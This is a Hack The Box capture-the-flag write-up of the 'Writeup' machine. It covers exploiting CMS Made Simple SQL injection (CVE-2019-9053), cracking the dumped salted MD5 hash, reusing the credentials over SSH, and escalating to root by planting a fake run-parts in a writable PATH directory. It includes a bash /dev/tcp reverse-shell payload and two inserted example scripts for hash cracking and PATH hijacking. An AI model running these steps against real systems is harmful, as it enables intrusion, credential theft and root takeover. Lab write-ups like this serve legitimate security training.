Hackthebox – Write-up

As with any box, this one started with the usual sequence of scans: a full TCP port scan (all ports), a UDP scan of the top 20 ports and a TCP -A scan for service and OS detection. Only the -A output is shown here.

root@kalivm:~/WriteUp# nmap -A -oN fullscan-A 
Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-02 18:41 CEST
Nmap scan report for
Host is up (0.016s latency).
Not shown: 998 filtered ports
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey: 
|   2048 dd:53:10:70:0b:d0:47:0a:e2:7e:4a:b6:42:98:23:c7 (RSA)
|   256 37:2e:14:68:ae:b9:c2:34:2b:6e:d9:92:bc:bf:bd:28 (ECDSA)
|_  256 93:ea:a8:40:42:c1:a8:33:85:b3:56:00:62:1c:a0:ab (ED25519)
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Nothing here yet.
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 4.11 (92%), Linux 3.12 (92%), Linux 3.13 (92%), Linux 3.13 or 4.2 (92%), Linux 3.16 (92%), Linux 3.16 - 4.6 (92%), Linux 3.2 - 4.9 (92%), Linux 3.8 - 3.11 (92%), Linux 4.2 (92%), Linux 4.4 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 22/tcp)
1   16.03 ms
2   16.06 ms

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Jul 26 12:53:01 2019 -- 1 IP address (1 host up) scanned in 26.72 seconds

Nothing particularly interesting, so I started browsing the web server and found a robots.txt file that disallows a /writeup directory, which its comment describes as an unfinished blog.

#              __
#      _(\    |@@|
#     (__/\__ \--/ __
#        \___|----|  |   __
#            \ }{ /\ )_ / _\
#            /\__/\ \__O (__
#           (--/\--)    \__/
#           _)(  )(_
#          `---''---`

# Disallow access to the blog until content is finished.
User-agent: * 
Disallow: /writeup/

Analysis of the blog shows that it runs on CMS Made Simple.
Source of Writeup mainpage showing CMS Made Simple
Research turns up several vulnerabilities, among them an unauthenticated blind SQL injection in CMS Made Simple versions before 2.2.10 (CVE-2019-9053) with a ready-made exploitation script. The script first extracts the password salt, username, email address and password hash from the database through the injection, then brute-forces the hash against a wordlist, which looks like a Hollywood-style password cracking animation while it runs. At the end it prints both the username and the cracked password, and these credentials turn out to be reused for SSH.

root@kalivm:~/WriteUp# ./cmsms.py -u http://writeup.htb/writeup -w /usr/share/wordlists/rockyou.txt -c

[+] Salt for password found: 5a599ef579066807
[+] Username found: jkr
[+] Email found: jkr@writeup.htb
[+] Password found: 62def4866937f08cc13bab43bb14e6f7
[+] Password cracked: raykayjay9
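The final step of that script is an offline dictionary attack on the dumped hash: CMS Made Simple stores a user's password as md5(salt + password), so each wordlist entry is salted, hashed and compared with the value pulled out of the database. The following is an added example of that step written for this page; it is not the exploit script's own code or the author's. The salt and hash are the ones dumped above, and the short wordlist at the bottom is constructed to stand in for rockyou.txt.

```python
import hashlib
from typing import Iterable, Optional, Union

# Values dumped by the SQL injection script in the write-up above.
SALT = "5a599ef579066807"
TARGET_HASH = "62def4866937f08cc13bab43bb14e6f7"


def _as_bytes(word: Union[str, bytes]) -> bytes:
    """Wordlists such as rockyou.txt are not valid UTF-8 throughout, so
    callers may pass raw bytes; plain strings are encoded as UTF-8."""
    return word if isinstance(word, bytes) else word.encode("utf-8")


def cmsms_hash(salt: str, password: Union[str, bytes]) -> str:
    """Hex MD5 of salt||password, the scheme CMS Made Simple uses."""
    return hashlib.md5(salt.encode("utf-8") + _as_bytes(password)).hexdigest()


def crack(salt: str, target_hash: str,
          candidates: Iterable[Union[str, bytes]]) -> Optional[str]:
    """Return the first candidate whose salted MD5 equals target_hash, or None.
    Trailing newlines are stripped so file objects can be passed directly."""
    target = target_hash.strip().lower()
    for raw in candidates:
        word = _as_bytes(raw).rstrip(b"\r\n")
        if cmsms_hash(salt, word) == target:
            return word.decode("utf-8", errors="replace")
    return None


def crack_wordlist_file(salt: str, target_hash: str, path: str) -> Optional[str]:
    """Stream a wordlist file in binary mode (e.g. /usr/share/wordlists/rockyou.txt)."""
    with open(path, "rb") as fh:
        return crack(salt, target_hash, fh)


if __name__ == "__main__":
    # Constructed mini-wordlist for a stand-alone run; the real attack streams
    # rockyou.txt through crack_wordlist_file instead.
    wordlist = ["password", "letmein", "raykayjay9", "writeup"]
    print("[+] Password cracked:", crack(SALT, TARGET_HASH, wordlist))
```

Because the hash is an unsalted-per-user MD5 with a single site-wide salt, every candidate costs one MD5 computation; rockyou.txt (about 14 million entries) is exhausted in seconds, which is why the script's "cracking" looks instantaneous for a password like the one above.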

root@kalivm:~/WriteUp# ssh jkr@writeup.htb
jkr@writeup.htb's password: 
Linux writeup 4.9.0-8-amd64 x86_64 GNU/Linux

The programs included with the Devuan GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Devuan GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Aug  2 12:56:35 2019 from
jkr@writeup:~$ cat user.txt

Privilege escalation

After some initial enumeration, one writable directory stood out as remarkable, although I had no use for it yet.

jkr@writeup:~$ find / -writable -type d 2>/dev/null

Other than that nothing specific stood out, so the next step was to look at processes. Since ps aux only shows a snapshot of what is running at that moment, I used pspy, which watches /proc without needing root and logs processes as they are spawned, including short-lived cron jobs and login hooks. Within a short time it logged something that really stood out.

jkr@writeup:/tmp/sed$ wget
--2019-08-02 13:10:12--
Connecting to connected.
HTTP request sent, awaiting response... 200 OK
Length: 4468984 (4.3M) [application/octet-stream]
Saving to: ‘pspy64’

pspy64               100%[===============================>]   4.26M  5.66MB/s    in 0.8s

2019-08-02 13:10:12 (5.66 MB/s) - ‘pspy64’ saved [4468984/4468984]

jkr@writeup:/tmp/sed$ chmod +x pspy64 
jkr@writeup:/tmp/sed$ ./pspy64 
2019/08/02 13:11:29 CMD: UID=0    PID=6594   | sh -c /usr/bin/env -i PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin run-parts --lsbsysinit /etc/update-motd.d > /run/motd.dynamic.new 

Now this is where things get interesting. The job runs as root (UID=0) through env -i, which wipes the environment and sets PATH explicitly, with /usr/local/sbin in first position. run-parts is invoked by bare name rather than by absolute path, so it is resolved through that PATH, and /usr/local/sbin is exactly the directory I had found to be writable earlier (on Debian-derived systems /usr/local/sbin is group-writable by staff by default). Anything placed there under the name run-parts therefore executes as root the next time the job fires. The command itself is the pam_motd hook that regenerates /run/motd.dynamic, so it fires on every new login session. I used this to write a short script that copies root.txt to /tmp and makes it world-readable.

jkr@writeup:/tmp$ mkdir sed
jkr@writeup:/tmp$ cd sed
jkr@writeup:/tmp/sed$ nano rp
#!/usr/bin/env bash
cp /root/root.txt /tmp/sed/sed.txt
chmod 777 /tmp/sed/sed.txt
jkr@writeup:/tmp/sed$ chmod +x rp

Move the script into /usr/local/sbin under the name run-parts, then wait for the next login to trigger the motd job, which runs the planted file as root. Opening a second SSH session as jkr is enough to trigger it; there is no need to wait for another user. Once the flag has been copied, remove the planted file again, since every later login would otherwise keep running it.

jkr@writeup:/tmp/sed$ mv rp /usr/local/sbin/run-parts
jkr@writeup:/tmp/sed$ ls
jkr@writeup:/tmp/sed$ cat sed.txt 
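To make the mechanism behind the pspy line and the steps above reproducible without root, here is an added example (written for this page, not the author's code) that rebuilds the situation in a scratch directory: a writable directory standing in for /usr/local/sbin is placed first on PATH, and the same `env -i PATH=... run-parts --lsbsysinit` invocation is run. It also contains the two checks a reviewer of such a job would want: which file a bare command name resolves to under a given PATH, and which PATH entries the current user can write to. The directory names under the temp tree are assumptions of the example.

```bash
#!/usr/bin/env bash
# Added example, not from the original write-up: reproduces the PATH-resolution
# flaw seen in the pspy output in a temp tree as an unprivileged user, plus the
# audit checks for such jobs.
set -eu

# What execvp() does for a bare command name: walk PATH left to right and run
# the first executable regular file found. Prints that path; fails if none.
resolve_on_path() {
    local name=$1 path=$2 dir
    local IFS=:
    for dir in $path; do
        if [ -f "$dir/$name" ] && [ -x "$dir/$name" ]; then
            printf '%s\n' "$dir/$name"
            return 0
        fi
    done
    return 1
}

# Audit check: every PATH entry the current user can write to is a place where
# a privileged job that resolves commands by name can be hijacked.
writable_path_dirs() {
    local path=$1 dir
    local IFS=:
    for dir in $path; do
        if [ -d "$dir" ] && [ -w "$dir" ]; then
            printf '%s\n' "$dir"
        fi
    done
    return 0
}

# End-to-end reproduction: "local_sbin" stands in for the writable
# /usr/local/sbin, "update-motd.d" for the real script directory (assumed names).
demo_path_hijack() {
    local work fake_sbin motd_dir out
    work=$(mktemp -d)
    fake_sbin="$work/local_sbin"
    motd_dir="$work/update-motd.d"
    mkdir -p "$fake_sbin" "$motd_dir"

    # The planted file: same name as the real tool, first on PATH.
    cat > "$fake_sbin/run-parts" <<'EOF'
#!/bin/sh
echo "hijacked: $0 uid=$(id -u) args: $*"
EOF
    chmod +x "$fake_sbin/run-parts"

    # Same shape as the motd job: env -i wipes the environment, PATH puts the
    # writable directory first and run-parts is a bare name, so the plant wins.
    out=$(/usr/bin/env -i PATH="$fake_sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin" \
          run-parts --lsbsysinit "$motd_dir")

    rm -rf "$work"
    printf '%s\n' "$out"
}

# Stand-alone run: show the hijack, then audit the motd job's PATH on this host.
demo_path_hijack
echo "writable entries in the motd job's PATH (empty is what you want):"
writable_path_dirs "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
```

On the real target the job's PATH lookup would have been harmless if either /usr/local/sbin were not writable by jkr or the job called /bin/run-parts by absolute path; the audit function above catches the first condition, and the resolver shows what the second one changes.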

Alternative Privilege Escalation

As an alternative, the planted run-parts could also have contained a reverse shell back to my own machine. The file needs a bash shebang: without one it is executed by /bin/sh, which is dash on this system and does not understand the >& /dev/tcp redirection.

jkr@writeup:/tmp/sed$ nano rp
#!/bin/bash
bash -i >& /dev/tcp/ 0>&1
jkr@writeup:/tmp/sed$ chmod +x rp
jkr@writeup:/tmp/sed$ cp rp /usr/local/sbin/run-parts

With the script in place and a listener running on my own system, the next login triggers the motd job and the shell connects back as root:

root@kalivm:~/WriteUp# nc -nlvp 9996
Listening on [] (family 2, port 9996)
Connection from 54582 received!
bash: cannot set terminal process group (2099): Inappropriate ioctl for device
bash: no job control in this shell
root@writeup:/# cat /root/root.txt
